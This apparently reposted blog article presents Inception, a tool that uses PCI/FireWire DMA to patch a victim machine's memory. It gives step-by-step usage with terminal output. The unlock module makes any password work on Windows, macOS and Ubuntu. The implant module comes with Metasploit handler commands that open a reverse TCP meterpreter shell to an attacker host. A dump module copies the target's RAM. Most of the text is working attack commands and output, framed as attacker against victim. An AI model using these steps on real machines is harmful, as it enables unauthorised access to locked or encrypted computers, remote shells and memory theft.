Inception - A Physical Memory Manipulation and Hacking Tool Exploiting PCI-based DMA

Inception - A Physical Memory Manipulation and Hacking Tool Exploiting PCI-based DMA

Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe HW interfaces.

How It Works

Inception's modules work as follows: By presenting a Serial Bus Protocol 2 (SBP-2) unit directory to the victim machine over an IEEE1394 FireWire interface, the victim operating system thinks that an SBP-2 device has connected to the FireWire port. Since SBP-2 devices utilize Direct Memory Access (DMA) for fast, large bulk data transfers (e.g., FireWire hard drives and digital camcorders), the victim lowers its shields and enables DMA for the device. The tool now has full read/write access to the lower 4GB of RAM on the victim.

Once DMA is granted, the tool proceeds to search through available memory pages for signatures at certain offsets in the operating system's code. Once found, the tool manipulates this code. For instance, in the unlock module, the tool short circuits the operating system's password authentication module that is triggered if an incorrect password is entered.

After running that module you should be able to log into the victim machine using any password.

An analogy for this operation is planting an idea into the memory of the machine; the idea that every password is correct.

Requirements:

  • Hardware:
    • Attacker machine: Linux or Mac OS X (host /attacker machine) with a FireWire interface, either through a native FireWire port, an ExpressCard/PCMCIA expansion port or a Thunderbolt to FireWire adapter.
    • Victim machine: A FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port
  • Software:
    • Python 3
    • git
    • gcc (incl. g++)
    • cmake
    • pip (for automatic resolution of dependencies)
    • [libforensic1394] 3
    • msgpack

    Usage:

    1. Connect the attacker machine (host) and the victim (target) with a FireWire cable.
    2. Run Inception.
    Simply type:
      incept [module name]
    For a more complete and up-to-date description, please run:
      incept -h
    For detailed options on usage, run:
      incept [module name] -h


    Modules

    • Unlock:
    The unlock module can unlock (any password accepted) and escalate privileges to Administrator/root on almost any powered on a machine you have physical access to. The module is primarily attended to do its magic against computers that utilize full disk encryption such as BitLocker, FileVault, TrueCrypt or Pointsec. There are plenty of other (and better) ways to hack a machine that doesn't pack encryption.

    The unlock module is stable on machines that have 4 GiB of main memory or less. If your the target has more then that, you need to be lucky in order to find the signatures mapped to a physical memory page frame that the tool can reach.

    As of this version, it is able to unlock the following x86 and x64 operating systems:
    • Windows 8/8.1
    • Windows 7 (SP0, SP1 )
    • Windows Vista (SP0, SP1, SP2)
    • Windows XP (SP0, SP1, SP2, SP3)
    • Mac OS X (Mavericks, Mountain Lion, Lion, Snow Leopard, Leopard)
    • Ubuntu (Saucy, Raring, Quantal, Precise, Oneiric, Natty)
    • Linux Mint (12, 13)
    Other Linux distributions that use PAM-based authentication may also work using the Ubuntu signatures.

    To unlock, simply type:
      incept unlock  
       _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
    _| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
    _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
    _| _| _|_| _| _| _| _| _| _| _| _| _|_|
    _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|

    v.0.4.0 (C) Carsten Maartmann-Moe 2014
    Download: http://ift.tt/1DJ3Y5O | Twitter: @breaknenter

    [?] Will potentially write to file. OK? [y/N] y
    [*] Available targets (known signatures):

    [1] Windows 8 MsvpPasswordValidate unlock/privilege escalation
    [2] Windows 7 MsvpPasswordValidate unlock/privilege escalation
    [3] Windows Vista MsvpPasswordValidate unlock/privilege escalation
    [4] Windows XP MsvpPasswordValidate unlock/privilege escalation
    [5] Mac OS X DirectoryService/OpenDirectory unlock/privilege escalation
    [6] Ubuntu libpam unlock/privilege escalation
    [7] Linux Mint libpam unlock/privilege escalation

    [?] Please select target (or enter 'q' to quit): 2
    [*] Selected target: Windows 7 MsvpPasswordValidate unlock/privilege escalation
    [=============> ] 227 MiB ( 22%)
    [*] Signature found at 0xe373312 in page no. 58227
    [*] Patch verified; successful
    [*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

    • Implant:
    The implant module implants a (memory-only) Metasploit payload directly to the volatile memory of the target machine. It integrates with MSF through the msfrpcd daemon that is included in all versions of Metasploit.

    The current version only work as a proof-of-concept against Windows 7 SP1 x86. No other OSes, versions or architectures are supported, nor is there any guarantee that they will be supported in the future.

    To use it, start msfrpcd:
      msfrpcd -P [password]
    Then launch inception in another terminal:
      incept implant --msfpw [password] --msfopts [options]  
    As an example, to create a reverse TCP meterpreter shell from the target machine to your attacking host, first start the msfrpcd dameon, and then launch a console listening for callbacks.
      msfrpcd -P password
    msfconsole
    In the console, we configure the receiving end of the payload. We're setting the EXITFUNC option to thread to ensure that the target process stays alive if something should go awry:
      use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 172.16.1.1
    set EXITFUNC thread
    set ExitOnSession false
    exploit -j
    Then, in another terminal, we launch Inception:
      incept implant --msfpw password --msfopts LHOST=172.16.1.1

    _| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
    _| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
    _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
    _| _| _|_| _| _| _| _| _| _| _| _| _|_|
    _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|

    v.0.4.0 (C) Carsten Maartmann-Moe 2014
    Download: http://ift.tt/1DJ3Y5O | Twitter: @breaknenter

    [?] Will potentially write to file. OK? [y/N] y
    [!] This module currently only work as a proof-of-concept against Windows 7 SP1
    x86. No other OSes, versions or architectures are supported, nor is there
    any guarantee that they will be supported in the future.
    [?] What MSF payload do you want to use? windows/meterpreter/reverse_tcp
    [*] Selected options:
    [*] LPORT: 4444
    [*] LHOST: 172.16.1.1
    [*] EXITFUNC: thread
    [*] Stage 1: Searcing for injection point
    [================================> ] 537 MiB ( 53%)
    [*] Signature found at 0x219d118c in page no. 137681
    [*] Patching at 0x219d118c
    [\] Waiting to ensure stage 1 execution
    [*] Restoring memory at initial injection point
    [*] Stage 2: Searching for page allocated in stage 1
    [=========================> ] 434 MiB ( 42%)
    [*] Signature found at 0x1b2d9000 in page no. 111321
    [*] Patching at 0x1b2d9000
    [*] Patch verified; successful
    [*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

    • Dump:
    The dump module facilitates dumping of memory from the target to the attacking host. To dump, execute:
      incept dump  
       _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
    _| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
    _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
    _| _| _|_| _| _| _| _| _| _| _| _| _|_|
    _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|

    v.0.4.0 (C) Carsten Maartmann-Moe 2014
    Download: http://ift.tt/1DJ3Y5O | Twitter: @breaknenter

    [*] Dumping from 0x0 to 0x40000000, a total of 1 GiB:
    [==============================================================] 1024 MiB (100%)
    [*] Dumped memory to file memdump_0x0-0x40000000_20140830-174305.bin
    [*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!





    from Effect Hacking full article here